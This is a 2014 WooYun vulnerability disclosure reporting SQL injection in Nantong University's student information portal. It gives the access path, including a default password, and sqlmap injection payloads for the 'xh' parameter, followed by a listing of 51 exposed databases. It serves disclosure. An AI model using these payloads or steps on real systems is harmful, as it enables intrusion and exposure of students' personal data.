当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-087665

漏洞标题:南通大学某处存在sql注入导致大量学生数据泄漏

相关厂商:南通大学

漏洞作者: 路人甲

提交时间:2014-12-18 14:50

修复时间:2014-12-23 14:52

公开时间:2014-12-23 14:52

漏洞类型:用户资料大量泄漏

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-18: 细节已通知厂商并且等待厂商处理中
2014-12-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

妈呀,吓死我了,我只是上去查询一下我的信息,竟然发现一个注入点,里面的东西貌似有点多啊。。。。。。。

详细说明:

南通大学信息服务平台:http://my.ntu.edu.cn/
学号任意输入一个,密码:888888
进去后点击左边计算机等级考试报名信息查询,那个输入框存在注入
抓一下包,放进sqlmap,发现:

current user is DBA:    True


里面的东西好像不少。。。。

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: xh
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: xh=1314012162' AND 5675=5675 AND 'fCAW'='fCAW
Type: UNION query
Title: Generic UNION query (NULL) - 28 columns
Payload: xh=1314012162' UNION ALL SELECT NULL,NULL,NULL,CHAR(58)+CHAR(108)+CHAR(107)+C
HAR(121)+CHAR(58)+CHAR(73)+CHAR(97)+CHAR(113)+CHAR(68)+CHAR(115)+CHAR(113)+CHAR(101)+CHAR(
77)+CHAR(120)+CHAR(66)+CHAR(58)+CHAR(119)+CHAR(101)+CHAR(116)+CHAR(58),NULL,NULL,NULL,NULL
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
,NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: xh=1314012162'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: xh=1314012162' WAITFOR DELAY '0:0:5'--
---
[13:38:30] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
[13:38:30] [INFO] fetching database names
available databases [51]:
[*] CarAccessories
[*] card
[*] DataMing
[*] db_19
[*] db_B2CShop
[*] dfdffddf
[*] EduManager
[*] exam
[*] examSys
[*] GradeSys
[*] india
[*] jadedatabases
[*] jlxt
[*] jobSubmit
[*] jsxx
[*] LoginDate
[*] master
[*] model
[*] msdb
[*] mvcdb
[*] MyHotelManager
[*] newssystem
[*] NTU
[*] NTUINFO
[*] ntusso
[*] Photography
[*] pksrd
[*] pksrd2
[*] qkgl
[*] ReportServer
[*] ReportServerTempDB
[*] ryxx
[*] SampleDB
[*] SHTFTS
[*] SingleSignOn
[*] SQL02_TEMP
[*] sqsj
[*] SSO
[*] stock
[*] Tea
[*] tempdb
[*] test
[*] test1123
[*] TestExcelImp
[*] testLogin
[*] TestYKT
[*] user_login
[*] xsxx
[*] yjsgl_new
[*] ykt
[*] yysd


里面有班级、学号、身份证等等反正很多就是了。。。。

漏洞证明:

同上

修复方案:

不知道

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-12-23 14:52

厂商回复:

最新状态:

暂无